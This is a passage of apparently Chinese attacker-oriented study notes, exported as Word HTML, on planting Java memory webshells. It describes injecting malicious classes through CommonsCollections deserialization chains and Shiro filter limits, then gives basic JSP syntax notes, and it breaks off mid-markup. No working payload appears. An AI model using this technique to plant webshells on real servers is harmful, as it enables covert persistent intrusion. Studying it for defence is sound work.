'NormalTok';font-family: Consolas;" lang="EN-US"><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">archive</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                                                    </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;" lang="EN-US"><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">descriptors</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                                                    </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;" lang="EN-US"><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span> <span style="mso-tab-count:1 Blank;">           </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">descriptor</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">>assembly.xml</span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">descriptor</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                                                      </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                    </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">descriptors</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                                                        </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">configuration</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">天下大木头给的代码不能直接利用，要写一个有反序列化漏洞的servlet，然后用上面两个项目的代码生成payload去打</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">也就是在打cc链的时候把里面的恶意class改成我们的class，一般喜欢用cc11打</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="">单纯偷懒不想搞环境可以直接用jsp注入去调试看</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style=""><a href="https://mp.weixin.qq.com/s/USIn50RITRF87AigssRyaA" target="_blank">https://mp.weixin.qq.com/s/USIn50RITRF87AigssRyaA</a></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="">（servlet、listener、filter）</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="">但是jsp天然优势就是省略了获取context的过程，直接通过</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="">request.getServletContext()获取当前请求的context</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">              

              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="">利用反序列化漏洞写内存马是最复杂的，jsp写很简单，request和response变量很好获得，但是还是会落地class文件,同样的原因可以类比ysoserial.net中的GhostWebShell.cs，也是基于此想法，打算把之前的.net内存马全部改写整合到ysoserial.net中</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">filter内存马shiro没法用，因为shiro处理rememberme本身就是自己写了个filter去处理，在里面拿不到request和response</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Calibri;">listener内存马</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><%</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">这个里面写java代码</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">%></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">这个叫做小脚本，是写java代码的</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><%!--</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">这个里面是JSP的注释</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">--%></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">– –</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> 是客户端注释代码</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">                

                </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><%!</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> var可设置该页面的全局变量</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">%></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">这个是jsp中脚本声明，是些一些必要的方法的</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">                

                </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><%</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'AttributeTok';color: #7D9029;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">%></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> 有个</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'AttributeTok';color: #7D9029;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">符号的，叫做指令</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">                

                </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">$</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">这个是el表达式</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">                

                </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><%=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">变量 </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">%></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> 是 </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><%</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> out</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">println</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">变量</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">%></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> 的简写方式 </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><%</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">                

                </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">  </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">String</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> username</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"abc"</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">                

                </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">%></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">                

                </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">用户</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">:<%=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">username</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">%></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">                

                </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">用户</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">:<%</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> out</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">println</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">username</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">%></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">                

                

                

                </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><%%></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">叫代码片段，用户装java代码的</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">                

                </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><%!%></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">叫声明，用于声明函数或变量的。相当于声明类的成员。</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">                

                </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><%%></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">是jspscript代码段</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">在由jsp转换成Servlet后 </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><%%></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">中的代码是放在serive方法中</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">相当与<span style="mso-spacerun:yes;">  </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">doGet</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">()</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">和doPost</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">()</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">方法</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><%!%></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">是jsp声明</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">用来定义属性和方法的</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">在由jsp转换成Servlet后 </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><%!%></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">中的代码是放serive<span style="mso-spacerun:yes;">  </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span>方法之外的</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><%=%></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">是jsp表达式</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">在由jsp转换成Servlet后 </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><%=%></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">中的代码是放在</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">service方法中的</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">       </span>out</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">println</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"这里"</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span 